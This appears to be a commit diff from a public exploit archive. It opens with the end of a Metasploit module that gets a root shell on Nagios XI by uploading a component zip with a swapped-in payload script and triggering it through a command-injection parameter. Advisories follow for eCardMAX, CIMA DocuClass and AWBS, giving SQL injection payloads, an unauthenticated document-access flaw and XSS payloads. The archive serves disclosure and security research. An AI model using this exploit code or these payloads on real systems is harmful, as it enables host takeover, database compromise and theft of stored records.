'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
if res && res.code != 200
if res.redirect? && res.redirection.path == '/nagiosxi/install.php'
vprint_warning('Nagios XI not configured')
else
fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!')
end
end
end
def pop_dat_shell
send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
'cookie' => @admin_cookie,
'vars_get' => {
'host' => @monitored_host,
'end' => ';sudo ../profile/getprofile.sh #'
}
)
end
#
# Support methods
#
def payload_zip
zip = Rex::Zip::Archive.new
Zip::File.open_buffer(@profile_component) do |z|
z.each do |f|
zip.entries << Rex::Zip::Entry.new(
f.name,
(if f.ftype == :file
if f.name == 'profile/getprofile.sh'
payload.encoded
else
z.read(f)
end
else
''
end),
Rex::Zip::CM_DEFLATE,
nil,
(Rex::Zip::EFA_ISDIR if f.ftype == :directory)
)
end
end
zip.pack
end
#
# Utility methods
#
def zip_filename
@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
end
end

3
platforms/php/webapps/40058.txt
View file

@ -1,3 +1,6 @@
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities

62
platforms/php/webapps/40059.txt Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]
DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
Vulnerability Details
1. SQL Injection [Post Auth]
PoC
Vulnerable URLs & parameters:
A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008
Impact
An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
2. Access Control Flaws
DocuClass web application does not enforce strict access control.
PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf
Dump all the documents with a bit of scripting.
Impact
An unauthenticated user can access stored documents by directly calling the document url.
3. Cross-Site Scripting
DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]
Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+++++

100
platforms/php/webapps/40062.txt Executable file
View file

@ -0,0 +1,100 @@
AWBS v2.9.6 Multiple Remote Vulnerabilities
Vendor: Total Online Solutions, Inc.
Product web page: http://www.awbs.com
Affected version: 2.9.6
Platform: PHP
Summary: Whether starting new or looking to expand your
existing web hosting and/or domain registration business,
the AWBS fully automated solutions and unique features will
allow you achieve your goal with minimum effort and cost.
Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
Input passed via the 'cat' and 'so' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code. Multiple cross-site scripting vulnerabilities were also
discovered. The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Apache
PHP/5.3.28
MySQL/5.5.50-cll
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5337
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php
08.06.2016
--
1. SQL Injection:
-----------------
Parameter: cat, so (GET)
POC URL:
http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
http://localhost/admin/hostingadmin.php?list=f&so=domain%27
http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100
2. Cross-Site Scripting (Stored):
---------------------------------
http://localhost/admin/cmanage.php
Parameters: reason (POST)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://localhost/admin/helpdesk.php
Parameters: hd_name, hd_url, hd_subject (POST)
Payload(s):
Content-Disposition: form-data; name="hd_name"
"><script>alert(1)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_url"
"><script>alert(2)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_subject"
<img src=x onerror=alert(3)>
-----------------------------28698210634144
3. Cross-Site Scripting (Reflected):
------------------------------------
http://localhost/admin/useradmin.php
Parameters: list (POST)
http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameters: search, cat, list, so (GET)
http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameter: list (GET)
http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
Parameters: id, sd (GET)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E